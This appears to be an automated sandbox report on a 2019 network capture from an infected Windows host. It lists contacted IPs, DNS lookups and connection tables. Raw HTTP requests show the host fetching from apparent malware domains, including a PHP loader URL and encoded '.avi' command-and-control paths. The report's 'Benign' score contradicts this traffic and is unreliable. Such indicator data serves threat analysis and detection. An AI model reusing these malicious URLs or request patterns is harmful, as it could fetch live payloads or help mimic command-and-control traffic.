Analysis

Category Package Started Completed Duration
PCAP 2019-10-08 08:09:28 2019-10-08 08:09:28 0 seconds


MalScore

1.0

Benign


Signatures

Looks up the external IP address
domain: myip.opendns.com

Hosts

Direct IP Country Name
N 91.240.87.19 [VT] Russian Federation
Y 89.163.144.224 [VT] Germany
Y 85.114.134.49 [VT] Germany
N 72.21.81.200 [VT] United States
Y 68.65.122.52 [VT] United States
N 37.230.112.226 [VT] Russian Federation
N 23.218.156.11 [VT] United States
N 208.91.197.91 [VT] Virgin Islands, British
N 208.67.222.222 [VT] United States
Y 198.54.125.57 [VT] United States
Y 198.54.115.33 [VT] United States
Y 185.212.47.167 [VT] Germany
N 185.158.249.39 [VT] Netherlands
N 185.139.69.88 [VT] unknown
Y 185.136.169.160 [VT] Germany
N 176.10.125.110 [VT] Switzerland
Y 162.213.250.131 [VT] United States
Y 151.106.27.208 [VT] France
N 109.230.199.24 [VT] Sweden
N 104.73.85.137 [VT] United States

DNS

Name Response Post-Analysis Lookup
_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.stingrayahoy.com [VT]
stingrayahoy-dc.stingrayahoy.com [VT] A 10.0.90.9 [VT]
_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.stingrayahoy.com [VT]
wpad.stingrayahoy.com [VT] NXDOMAIN [VT]
StingrayAhoy-DC.stingrayahoy.com [VT]
isatap.stingrayahoy.com [VT]
isatap.localdomain [VT]
_ldap._tcp.Default-First-Site-Name._sites.StingrayAhoy-DC.stingrayahoy.com [VT]
_ldap._tcp.StingrayAhoy-DC.stingrayahoy.com [VT]
www.msftncsi.com [VT] A 23.218.156.26 [VT]
CNAME www.msftncsi.com.edgesuite.net [VT]
A 23.218.156.11 [VT]
CNAME a1961.g2.akamai.net [VT]
dns.msftncsi.com [VT] A 131.107.255.255 [VT]
dns.msftncsi.com [VT] AAAA fd3e:4f5a:5b81::1 [VT]
Seoul-4a67-PC.stingrayahoy.com [VT]
stingrayahoy.com [VT] CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
ljeffery54ae.top [VT] A 91.240.87.19 [VT]
ksoniay95ee.info [VT] A 37.230.112.226 [VT]
api.bing.com [VT] CNAME api-bing-com.e-0001.e-msedge.net [VT]
CNAME e-0001.e-msedge.net [VT]
A 13.107.5.80 [VT]
www.bing.com [VT] CNAME dual-a-0001.a-msedge.net [VT]
CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
A 13.107.21.200 [VT]
iecvlist.microsoft.com [VT] CNAME cs9.wpc.v0cdn.net [VT]
CNAME ie9comview.vo.msecnd.net [VT]
A 72.21.81.200 [VT]
resolver1.opendns.com [VT] A 208.67.222.222 [VT]
222.222.67.208.in-addr.arpa [VT] PTR resolver1.opendns.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com [VT] A 173.166.146.112 [VT]
myip.opendns.com [VT]
zindv.club [VT] A 185.139.69.88 [VT]
www.download.windowsupdate.com [VT] A 104.73.85.137 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME download.windowsupdate.com.edgesuite.net [VT]
CNAME a767.dspw65.akamai.net [VT]
pompeiiii.org [VT] A 208.91.197.91 [VT]
adsfinder.xyz [VT] A 185.158.249.39 [VT]
wpad.localdomain [VT]
qqtube.club [VT] A 109.230.199.24 [VT]
parolinos.xyz [VT] A 176.10.125.110 [VT]

TCP

Source Source Port Destination Destination Port
10.0.90.175 49155 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49156 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49157 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49158 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49159 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49160 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49161 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49162 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49163 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49164 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49165 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49166 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49167 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49168 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49170 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49171 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49172 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49173 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49174 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49175 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49176 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49177 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49178 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49179 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49180 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49181 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49182 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49184 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49185 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49186 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49187 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49188 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49189 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49190 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49191 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49192 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49193 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49194 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49196 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49197 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49198 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49199 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49200 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49208 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49209 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49220 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49226 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49232 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49237 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49243 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49248 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49249 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49252 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49253 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49254 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49255 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49256 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49257 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49261 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49262 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49263 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49264 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49265 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49266 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49267 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49268 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49273 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49277 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49278 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49284 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49289 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49295 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49300 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49301 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49302 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49303 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49304 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49305 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49306 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49312 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49316 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49317 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49318 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49319 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49320 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49321 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49322 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49324 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49330 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49335 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49341 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49347 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49352 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49353 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49354 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49355 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49356 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49357 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49358 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49359 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49365 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49370 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49374 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49375 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49376 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49377 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49378 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49379 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49380 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49383 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49388 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49394 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49211 104.73.85.137 www.download.windowsupdate.com 80
10.0.90.175 49363 109.230.199.24 qqtube.club 443
10.0.90.175 49364 109.230.199.24 qqtube.club 443
10.0.90.175 49366 109.230.199.24 qqtube.club 443
10.0.90.175 49367 109.230.199.24 qqtube.club 443
10.0.90.175 49368 109.230.199.24 qqtube.club 443
10.0.90.175 49391 109.230.199.24 qqtube.club 443
10.0.90.175 49392 109.230.199.24 qqtube.club 443
10.0.90.175 49393 109.230.199.24 qqtube.club 443
10.0.90.175 49213 151.106.27.208 80
10.0.90.175 49216 151.106.27.208 80
10.0.90.175 49350 162.213.250.131 80
10.0.90.175 49371 176.10.125.110 parolinos.xyz 443
10.0.90.175 49372 176.10.125.110 parolinos.xyz 443
10.0.90.175 49396 176.10.125.110 parolinos.xyz 443
10.0.90.175 49397 176.10.125.110 parolinos.xyz 443
10.0.90.175 49215 185.136.169.160 443
10.0.90.175 49217 185.136.169.160 443
10.0.90.175 49218 185.136.169.160 443
10.0.90.175 49219 185.136.169.160 443
10.0.90.175 49221 185.136.169.160 443
10.0.90.175 49222 185.136.169.160 443
10.0.90.175 49223 185.136.169.160 443
10.0.90.175 49224 185.136.169.160 443
10.0.90.175 49225 185.136.169.160 443
10.0.90.175 49227 185.136.169.160 443
10.0.90.175 49228 185.136.169.160 443
10.0.90.175 49229 185.136.169.160 443
10.0.90.175 49230 185.136.169.160 443
10.0.90.175 49231 185.136.169.160 443
10.0.90.175 49233 185.136.169.160 443
10.0.90.175 49234 185.136.169.160 443
10.0.90.175 49235 185.136.169.160 443
10.0.90.175 49236 185.136.169.160 443
10.0.90.175 49238 185.136.169.160 443
10.0.90.175 49239 185.136.169.160 443
10.0.90.175 49240 185.136.169.160 443
10.0.90.175 49241 185.136.169.160 443
10.0.90.175 49242 185.136.169.160 443
10.0.90.175 49244 185.136.169.160 443
10.0.90.175 49245 185.136.169.160 443
10.0.90.175 49246 185.136.169.160 443
10.0.90.175 49247 185.136.169.160 443
10.0.90.175 49250 185.136.169.160 443
10.0.90.175 49251 185.136.169.160 443
10.0.90.175 49258 185.136.169.160 443
10.0.90.175 49259 185.136.169.160 443
10.0.90.175 49260 185.136.169.160 443
10.0.90.175 49269 185.136.169.160 443
10.0.90.175 49270 185.136.169.160 443
10.0.90.175 49271 185.136.169.160 443
10.0.90.175 49272 185.136.169.160 443
10.0.90.175 49274 185.136.169.160 443
10.0.90.175 49275 185.136.169.160 443
10.0.90.175 49276 185.136.169.160 443
10.0.90.175 49279 185.136.169.160 443
10.0.90.175 49280 185.136.169.160 443
10.0.90.175 49281 185.136.169.160 443
10.0.90.175 49282 185.136.169.160 443
10.0.90.175 49283 185.136.169.160 443
10.0.90.175 49285 185.136.169.160 443
10.0.90.175 49286 185.136.169.160 443
10.0.90.175 49287 185.136.169.160 443
10.0.90.175 49288 185.136.169.160 443
10.0.90.175 49290 185.136.169.160 443
10.0.90.175 49291 185.136.169.160 443
10.0.90.175 49292 185.136.169.160 443
10.0.90.175 49293 185.136.169.160 443
10.0.90.175 49294 185.136.169.160 443
10.0.90.175 49296 185.136.169.160 443
10.0.90.175 49297 185.136.169.160 443
10.0.90.175 49298 185.136.169.160 443
10.0.90.175 49299 185.136.169.160 443
10.0.90.175 49307 185.136.169.160 443
10.0.90.175 49308 185.136.169.160 443
10.0.90.175 49309 185.136.169.160 443
10.0.90.175 49310 185.136.169.160 443
10.0.90.175 49311 185.136.169.160 443
10.0.90.175 49313 185.136.169.160 443
10.0.90.175 49314 185.136.169.160 443
10.0.90.175 49315 185.136.169.160 443
10.0.90.175 49210 185.139.69.88 zindv.club 443
10.0.90.175 49212 185.139.69.88 zindv.club 443
10.0.90.175 49214 185.139.69.88 zindv.club 443
10.0.90.175 49348 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49349 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49360 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49361 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49381 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49382 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49384 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49385 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49386 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49387 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49389 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49325 185.212.47.167 443
10.0.90.175 49326 185.212.47.167 443
10.0.90.175 49327 185.212.47.167 443
10.0.90.175 49328 185.212.47.167 443
10.0.90.175 49329 185.212.47.167 443
10.0.90.175 49331 185.212.47.167 443
10.0.90.175 49332 185.212.47.167 443
10.0.90.175 49333 185.212.47.167 443
10.0.90.175 49334 185.212.47.167 443
10.0.90.175 49336 185.212.47.167 443
10.0.90.175 49337 185.212.47.167 443
10.0.90.175 49338 185.212.47.167 443
10.0.90.175 49339 185.212.47.167 443
10.0.90.175 49340 185.212.47.167 443
10.0.90.175 49342 185.212.47.167 443
10.0.90.175 49343 185.212.47.167 443
10.0.90.175 49344 185.212.47.167 443
10.0.90.175 49345 185.212.47.167 443
10.0.90.175 49369 198.54.115.33 443
10.0.90.175 49395 198.54.115.33 443
10.0.90.175 49362 198.54.125.57 443
10.0.90.175 49390 198.54.125.57 443
10.0.90.175 49323 208.91.197.91 pompeiiii.org 443
10.0.90.175 49183 23.218.156.11 www.msftncsi.com 80
10.0.90.175 49202 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49203 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49204 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49205 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49373 68.65.122.52 443
10.0.90.175 49206 72.21.81.200 iecvlist.microsoft.com 443
10.0.90.175 49207 72.21.81.200 iecvlist.microsoft.com 443
10.0.90.175 49351 85.114.134.49 80
10.0.90.175 49346 89.163.144.224 80
10.0.90.175 49201 91.240.87.19 ljeffery54ae.top 80
10.0.90.9 445 10.0.90.175 49189
10.0.90.9 445 10.0.90.175 49201
187.188.166.192 80 10.0.90.175 49209
216.98.148.157 8080 10.0.90.175 49210

UDP

Source Source Port Destination Destination Port
10.0.90.175 137 10.0.90.255 137
10.0.90.175 123 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 123
10.0.90.175 49480 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 49481 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49482 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49998 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 50013 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 50073 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 51572 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52092 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52093 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 52393 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52727 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53010 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53640 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53775 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53996 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54226 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54227 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 54403 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54547 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54639 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54715 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55382 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55465 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55480 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55709 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55710 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 55773 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55983 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56060 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56229 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56239 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56761 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56903 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57126 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57265 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57266 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 57385 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57450 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57906 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57937 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58439 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58440 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 58441 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 58664 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58900 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59671 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59790 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59791 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 59964 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60014 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60322 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60323 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 60369 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60407 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60509 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60962 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60967 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60969 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 60970 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 61041 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61413 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61436 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61885 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61886 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 61988 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 62142 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 62852 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63136 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63637 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63956 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63957 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 63958 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 63959 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64150 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64206 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64207 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64252 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64253 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64254 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64355 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64775 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64911 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64912 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 65030 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 65497 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56762 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56763 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56764 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56765 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56766 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 49882 224.0.0.252 5355
10.0.90.175 52750 224.0.0.252 5355
10.0.90.175 57910 224.0.0.252 5355
10.0.90.175 60681 224.0.0.252 5355
10.0.90.175 64205 224.0.0.252 5355
10.0.90.175 65004 224.0.0.252 5355
10.0.90.175 68 255.255.255.255 67
10.0.90.9 67 10.0.90.175 68

HTTP Requests

URI Data
http://www.msftncsi.com/ncsi.txt
GET /ncsi.txt HTTP/1.1
Connection: Close
User-Agent: Microsoft NCSI
Host: www.msftncsi.com

http://ljeffery54ae.top/skoex/po2.php?l=cupk6.fgs
GET /skoex/po2.php?l=cupk6.fgs HTTP/1.1
Host: ljeffery54ae.top
Connection: Keep-Alive

http://ksoniay95ee.info/images/CI9BVzd6AqB/ZNUmRFBAKmX4q_/2FIAs9nQJlVF7_2BTvRU5/ZPqTgOgLDp8JzrCL/_2Fcm_2BF41yLbk/eclytPd8CmogXhag5f/iJKuzzkmf/M1zwJZUnnnK6LJcptL1S/m6Hl99BQ3fNUdtPt9So/0Zzs4gdqrhrs/_2FJr.avi
GET /images/CI9BVzd6AqB/ZNUmRFBAKmX4q_/2FIAs9nQJlVF7_2BTvRU5/ZPqTgOgLDp8JzrCL/_2Fcm_2BF41yLbk/eclytPd8CmogXhag5f/iJKuzzkmf/M1zwJZUnnnK6LJcptL1S/m6Hl99BQ3fNUdtPt9So/0Zzs4gdqrhrs/_2FJr.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive

http://ksoniay95ee.info/favicon.ico
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: PHPSESSID=suakbds203f3nv19rh1su4vuo7; lang=en

http://ksoniay95ee.info/images/zqt4lIX7/WURokuO9vh89Yy_2BsUJrS9/PjffqPwJdE/ySWjXv6UbPaKFMooy/6X5boj6wckcc/Ucw3dM3Mi_2/FznVDXGp2L3Py2/JxFQvMX4xN_2FzOJs9Vmk/BMKiWvw71S3sGLtJ/XPIlWh5f6mD5BYu/asfVMoi7/c.avi
GET /images/zqt4lIX7/WURokuO9vh89Yy_2BsUJrS9/PjffqPwJdE/ySWjXv6UbPaKFMooy/6X5boj6wckcc/Ucw3dM3Mi_2/FznVDXGp2L3Py2/JxFQvMX4xN_2FzOJs9Vmk/BMKiWvw71S3sGLtJ/XPIlWh5f6mD5BYu/asfVMoi7/c.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
